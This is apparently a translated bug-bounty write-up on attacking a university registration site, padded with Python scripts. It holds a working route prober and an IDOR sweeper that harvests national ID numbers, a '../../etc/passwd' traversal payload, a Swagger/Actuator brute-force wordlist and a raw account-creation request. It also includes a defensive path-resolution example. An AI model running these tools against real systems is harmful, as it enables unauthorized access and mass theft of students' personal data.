Notes on a vulnerability hunt against a university
Recently, with some spare time, I wanted to earn a certificate for fun, so I picked a university from the EDUSRC gift center.
Identifying the site
Hunter (鹰图) search syntax (icp.name matches the ICP filing name; the two body terms match pages containing the words "register" and "login"):
icp.name="某高校" && (body="注册" && body="登录")
After assorted information gathering, Hunter turned up a registration site.
Unauthorized access
I registered an arbitrary account and started by looking for a way in on the login page.
The browser devtools (F12) showed a JSON endpoint listing a large number of front-end routes.
Walking through those route paths from the login page gave direct access without any authentication: one unauthorized-access finding.
Sensitive information disclosure
Stopping after a single bug is obviously not worth much, so next I went through the Burp history and found a userinfo endpoint.
The endpoint returned the user's national ID number, and testing showed the id parameter was not subject to any authorization check: iterating userId enumerates the sensitive information of the whole school (an IDOR), a second finding, sensitive information disclosure.
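The two steps above (probing front-end routes without a session, then sweeping the userinfo endpoint over userId values) share the same plumbing, so here is one script covering both. It is an added example, not code from the original post: the route-config shape, the host, the userinfo path and the query-parameter name are assumptions, and the sample route list is constructed.

```python
# Added example (not code from the original post): enumerate the front-end
# routes from the login page's JSON route config and probe each one without a
# session, then sweep the userinfo endpoint over userId values and report the
# ones whose response leaks a national ID number. The host, the userinfo path,
# the query parameter name and the route-config shape are assumptions.
from __future__ import annotations

import json
import re
import urllib.error
import urllib.parse
import urllib.request

# 18-digit PRC resident ID number: 17 digits plus a check digit that may be X.
ID_NUMBER_RE = re.compile(r"(?<!\d)\d{17}[\dXx](?!\d)")


def extract_paths(route_json: str) -> list[str]:
    """Collect every absolute 'path' value from a nested (vue-router style) route config."""
    found: set[str] = set()

    def walk(node: object) -> None:
        if isinstance(node, dict):
            path = node.get("path")
            if isinstance(path, str) and path.startswith("/"):
                found.add(path)
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for value in node:
                walk(value)

    walk(json.loads(route_json))
    return sorted(found)


def classify(status: int, location: str | None, body: str) -> str:
    """Turn an unauthenticated response into a verdict worth reading."""
    if status in (301, 302, 303, 307, 308):
        return "login-redirect" if location and "login" in location.lower() else "redirect"
    if status in (401, 403):
        return "denied"
    if status == 404:
        return "missing"
    if status == 200:
        return "open"
    return f"other-{status}"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx responses to the caller instead of silently following them."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch(url: str, token: str | None = None, timeout: float = 10.0) -> tuple[int, str | None, str]:
    """GET url and return (status, Location header, body) without following redirects."""
    req = urllib.request.Request(url, headers={"User-Agent": "route-probe/0.1"})
    if token:
        req.add_header("token", token)  # the target's custom auth header, as seen in the post
    try:
        with urllib.request.build_opener(_NoRedirect).open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location"), resp.read(65536).decode("utf-8", "replace")
    except urllib.error.HTTPError as err:  # urllib raises for 3xx (with _NoRedirect), 4xx and 5xx
        return err.code, err.headers.get("Location"), err.read(65536).decode("utf-8", "replace")


def probe_routes(base: str, paths: list[str]) -> dict[str, str]:
    """Map each path to its verdict when requested with no credentials."""
    verdicts = {}
    for path in paths:
        status, location, body = fetch(urllib.parse.urljoin(base, path))
        verdicts[path] = classify(status, location, body)
    return verdicts


def find_id_numbers(body: str) -> list[str]:
    """Return the distinct ID-number-shaped values in a response body."""
    return sorted(set(ID_NUMBER_RE.findall(body)))


def idor_sweep(base: str, userinfo_path: str, user_ids, token: str | None = None) -> dict[str, list[str]]:
    """Request userinfo for each id and keep the ones whose response carries an ID number."""
    hits = {}
    for uid in user_ids:
        query = urllib.parse.urlencode({"userId": uid})  # parameter name assumed
        status, _, body = fetch(f"{urllib.parse.urljoin(base, userinfo_path)}?{query}", token)
        numbers = find_id_numbers(body) if status == 200 else []
        if numbers:
            hits[str(uid)] = numbers
    return hits


# Constructed stand-in for the route config the devtools exposed.
SAMPLE_ROUTES = json.dumps({
    "routes": [
        {"path": "/login", "name": "Login"},
        {"path": "/home", "children": [
            {"path": "/home/material", "meta": {"requiresAuth": True}},
            {"path": "/home/userinfo"},
        ]},
        {"path": "/admin", "redirect": "/admin/users", "children": [{"path": "/admin/users"}]},
    ]
})

if __name__ == "__main__":
    for path in extract_paths(SAMPLE_ROUTES):
        print(path)
    # Against a live target (hypothetical host and userinfo path):
    # print(probe_routes("https://target.example/", extract_paths(SAMPLE_ROUTES)))
    # print(idor_sweep("https://target.example/", "/api/user/v1/userinfo", range(1, 200)))
```

Redirects are deliberately not followed: a 302 to the login page is the expected answer for a protected route, so an "open" verdict only appears when the server answered 200 to a request that carried no session at all. The ID-number regex is what makes the sweep report something more specific than "200 OK".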
Arbitrary file read
Among the routes collected for the first finding there was a materials endpoint; its historical requests showed a fullFileName parameter.
Constructing the payload produced a file:
../../etc/passwd
Opening the generated PDF showed the requested file's contents: another finding, arbitrary file read.
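The bug behind that payload is a file lookup that joins the parameter onto a base directory without confining the result. Below is an added example, not the site's code: the naive resolution next to a hardened one, with the materials directory name assumed.

```python
# Added example (not code from the original post): the naive file lookup that a
# parameter such as fullFileName reaches, beside a resolver that refuses anything
# leaving the materials directory. The directory name is an assumption.
from __future__ import annotations

import os
import urllib.parse

MATERIAL_ROOT = "/opt/materials"  # hypothetical directory the export feature reads from


def vulnerable_resolve(root: str, full_file_name: str) -> str:
    """What a join-and-normalise implementation does with the parameter."""
    return os.path.normpath(os.path.join(root, full_file_name))


def safe_resolve(root: str, full_file_name: str) -> str | None:
    """Return the absolute file path if it stays under root, otherwise None."""
    # Judge the decoded value: %2e%2e%2f must not slip past a textual check.
    name = urllib.parse.unquote(full_file_name)
    if not name or "\x00" in name or "\\" in name:
        return None
    # os.path.join drops root entirely when the second part is absolute.
    if os.path.isabs(name):
        return None
    root_abs = os.path.realpath(root)
    # realpath also collapses symlinks inside root that point elsewhere.
    candidate = os.path.realpath(os.path.join(root_abs, name))
    try:
        if os.path.commonpath([root_abs, candidate]) != root_abs:
            return None
    except ValueError:  # different drives on Windows
        return None
    return candidate


def materials_file(full_file_name: str) -> str | None:
    """Entry point a materials/export handler would call instead of joining blindly."""
    return safe_resolve(MATERIAL_ROOT, full_file_name)


if __name__ == "__main__":
    for value in ("2023/report.pdf", "../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd", "/etc/passwd"):
        print(f"{value!r:32} naive={vulnerable_resolve(MATERIAL_ROOT, value)!r:24} safe={materials_file(value)!r}")
```

Two details matter more than the `..` check itself: decoding before judging (so `%2e%2e` is treated as `..`), and comparing resolved paths rather than string prefixes, so that `/opt/materials-old/x` is not accepted as being under `/opt/materials`.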
Port scan / unauthorized access
A Goby scan found a further service on port 8098; visiting it returned code:404.
So I brute-forced directories with a Swagger/Actuator wordlist:
/swagger
/api-docs
/api.html
/swagger-ui
/swagger/codes
/api/index.html
/api/v2/api-docs
/v2/swagger.json
/swagger-ui/html
/distv2/index.html
/swagger/index.html
/sw/swagger-ui.html
/api/swagger-ui.html
/static/swagger.json
/user/swagger-ui.html
/swagger-ui/index.html
/swagger-dubbo/api-docs
/template/swagger-ui.html
/swagger/static/index.html
/dubbo-provider/distv2/index.html
/spring-security-rest/api/swagger-ui.html
/spring-security-oauth-resource/swagger-ui.html
/v2/api-docs
/swagger-ui.html
/mappings
/metrics
/beans
/configprops
/actuator/metrics
/actuator/mappings
/actuator/beans
/actuator/configprops
/actuator
/auditevents
/autoconfig
/caches
/conditions
/docs
/dump
/env
/flyway
/health
/heapdump
/httptrace
/info
/integrationgraph
/jolokia
/logfile
/loggers
/liquibase
/prometheus
/refresh
/scheduledtasks
/sessions
/shutdown
/trace
/threaddump
/actuator/auditevents
/actuator/health
/actuator/conditions
/actuator/env
/actuator/info
/api/swagger
/Swagger/ui/index
/api/swaggerui
/swagger/ui
/api/swagger/ui
/libs/swaggerui
/swagger-resources/configuration/ui
/swagger-resources/configuration/security
/druid/index.html
/swagger/v1/swagger.json
/swagger/v2/swagger.json
/api/doc
/docs/
/doc.html
/v1/api-docs
/v3/api-docs
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/scheduledtasks
/actuator/httptrace
/actuator/jolokia
/actuator/hystrix.stream
That found the route.
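Once a wordlist hit comes back, the useful work is telling a Swagger document from an Actuator index, and then reading the document for operations that declare no security requirement. The script below is an added example, not code from the original post: it fingerprints a response body, walks a Swagger 2.0 document (the format `/v2/api-docs` serves), flags operations with no security requirement, and builds the default request body swagger-ui prefills, which is where the `"string"` and `0` placeholders in the createUser request come from. The spec is constructed for the example; the userinfo path and the "token" security scheme name are assumptions.

```python
# Added example (not code from the original post): classify what a wordlist hit
# returned, then walk a Swagger 2.0 document (what /v2/api-docs serves) to list
# every operation, flag the ones with no security requirement, and build the
# default body swagger-ui would prefill (the "string" / 0 placeholders seen in the
# createUser request). The spec below is constructed for the example; the userinfo
# path and the "token" security scheme name are assumptions.
from __future__ import annotations

import json

HTTP_METHODS = {"get", "post", "put", "delete", "patch", "head", "options"}


def fingerprint(body: str) -> str:
    """Say what a response from the wordlist looks like."""
    text = body.lstrip()
    if text.startswith("{"):
        try:
            doc = json.loads(text)
        except ValueError:
            return "broken-json"
        if "paths" in doc and "swagger" in doc:
            return "swagger2"
        if "paths" in doc and "openapi" in doc:
            return "openapi3"
        if "_links" in doc:  # Spring Boot Actuator index lists its endpoints under _links
            return "actuator-index"
        return "json"
    low = text.lower()
    if "swagger-ui" in low or "swagger ui" in low or "swaggerui" in low:
        return "swagger-ui"
    return "other"


def example_from_schema(schema: dict, definitions: dict, depth: int = 0) -> object:
    """Build the placeholder value swagger-ui shows for a schema."""
    if depth > 8:  # guard against self-referencing definitions
        return {}
    if "$ref" in schema:
        name = schema["$ref"].rsplit("/", 1)[-1]
        return example_from_schema(definitions.get(name, {}), definitions, depth + 1)
    if "example" in schema:
        return schema["example"]
    kind = schema.get("type", "object")
    if kind == "object" or "properties" in schema:
        return {k: example_from_schema(v, definitions, depth + 1)
                for k, v in schema.get("properties", {}).items()}
    if kind == "array":
        return [example_from_schema(schema.get("items", {}), definitions, depth + 1)]
    if kind in ("integer", "number"):
        return 0
    if kind == "boolean":
        return True
    if kind == "string":
        return "string"
    return None


def list_operations(spec: dict) -> list[dict]:
    """One record per operation: method, path, operationId, secured flag, body example."""
    definitions = spec.get("definitions", {})
    global_secured = bool(spec.get("security"))
    records = []
    for path, item in spec.get("paths", {}).items():
        for method, op in item.items():
            if method.lower() not in HTTP_METHODS:
                continue
            # An operation-level "security": [] explicitly switches security off.
            secured = bool(op["security"]) if "security" in op else global_secured
            body = None
            for param in op.get("parameters", []):
                if param.get("in") == "body" and "schema" in param:
                    body = example_from_schema(param["schema"], definitions)
            records.append({"method": method.upper(), "path": path,
                            "operationId": op.get("operationId", ""),
                            "secured": secured, "body": body})
    return records


def summarize(spec_json: str) -> list[dict]:
    return list_operations(json.loads(spec_json))


def unsecured(spec_json: str) -> list[str]:
    """The operations a tester tries first: those the spec declares without auth."""
    return [f'{r["method"]} {r["path"]}' for r in summarize(spec_json) if not r["secured"]]


# Constructed miniature of a /v2/api-docs document.
SAMPLE_SPEC = json.dumps({
    "swagger": "2.0",
    "info": {"title": "user-service", "version": "v1"},
    "securityDefinitions": {"token": {"type": "apiKey", "name": "token", "in": "header"}},
    "paths": {
        "/api/user/v1/createUser": {"post": {
            "operationId": "createUser",
            "parameters": [{"in": "body", "name": "user", "schema": {"$ref": "#/definitions/User"}}]}},
        "/api/user/v1/userinfo": {"get": {
            "operationId": "userInfo", "security": [{"token": []}],
            "parameters": [{"in": "query", "name": "userId", "type": "string"}]}},
    },
    "definitions": {
        "User": {"type": "object", "properties": {
            "id": {"type": "integer"},
            "userName": {"type": "string"},
            "userRoleList": {"type": "array", "items": {"type": "integer"}},
            "page": {"$ref": "#/definitions/Page"}}},
        "Page": {"type": "object", "properties": {
            "pageIndex": {"type": "integer"},
            "list": {"type": "object"}}},
    },
})

if __name__ == "__main__":
    for record in summarize(SAMPLE_SPEC):
        print(record["method"], record["path"], "secured" if record["secured"] else "OPEN")
        if record["body"] is not None:
            print(json.dumps(record["body"], indent=2))
```

A spec that declares an operation as unsecured only says what the documentation generator saw; the server may still enforce something the annotations do not mention, and, as the next paragraph shows, the reverse is also true: a declared `token` header can be required in name only.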
Testing these endpoints showed that the token value is never actually validated; the server only checks that a token is present. So I created an account directly through one of the endpoints:
Payload:
POST /api/user/v1/createUser HTTP/1.1
Host: XXXXX:8098
Content-Length: 1028
accept: */*
DNT: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: application/json
Origin: XXXXX:8098
Referer: XXXXX:8098/swagger-ui/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en,zh;q=0.5
Connection: close
token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJIaXRlY2hAQXV0aCIsImV4cCI6MTY3OTY1Njk0NSwiaWF0IjoxNjc4NzkyOTQ1LCJIaXRlY2hAVXNlciI6IntcInRva2VuSWRcIjpcIjY5MWExZjk5NzU5ODQyZDQ4NjNhMTE3NjRkYTUyN2ZkXCIsXCJ0b2tlblR5cGVcIjpcImxvZ2luXCIsXCJicm93c2VySW5mb1wiOm51bGwsXCJ1aWRcIjoxNDUsXCJ1c2VySWRcIjpcIjIwMjMzMTRcIixcInVzZXJUeXBlXCI6bnVsbCxcInJlZ2lzdGVyVHlwZVwiOm51bGwsXCJwYXNzd29yZFwiOlwiYjQ1Y2ZmZTA4NGRkM2QyMGQ5MjhiZWU4NWU3YjBmMjFcIixcInVzZXJOYW1lXCI6XCJzdHJpbmdcIn0ifQ.VpljTWGWXKq0sOX6Euj_2dki1i0uRQme4Kb_D5wVysg

{
"birthDate": "string",
"classId": "string",
"code": "string",
"collegeId": "string",
"configPassword": "2023314",
"dutyType": 0,
"email": "string",
"endDate": "string",
"highestEducation": "string",
"id": 0,
"idNumber": "string",
"lastlogin": "string",
"logincnt": 0,
"majorId": "string",
"mobile": "1888888888",
"nation": "string",
"nativePlace": "string",
"page": {
"endRow": 0,
"list": {},
"pageIndex": 0,
"pageSize": 0,
"pages": 0,
"startRow": 0,
"total": 0
},
"paramFlag": "string",
"password": "2023314",
"passwordchangecnt": 0,
"phone": "1888888888",
"positionTitle": "string",
"qq": "string",
"regFlag": 0,
"registerType": "string",
"schoolId": "string",
"sex": 0,
"startDate": "string",
"userId": "123123123",
"userName": "edusrc1",
"userOrganizeList": [
"string"
],
"userRoleList": [
1
],
"userType": "string",
"validflag": 0,
"webPath": "string",
"workDepartment": "string",
"workUnit": "string"
}
Summary
Take vulnerability hunting slowly: when you can think one step further than others, you are already ahead of most people.
Originally published on the WeChat official account 奉天安全团队 under the title 记录一次某高校漏洞挖掘-文末抽奖 (notes on a vulnerability hunt against a university; giveaway at the end).
Disclaimer: the programs and methods described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site bears none. Questions may be sent by email (preferably from a corporate or other valid mailbox so the message is not filtered; contact details are on the home page).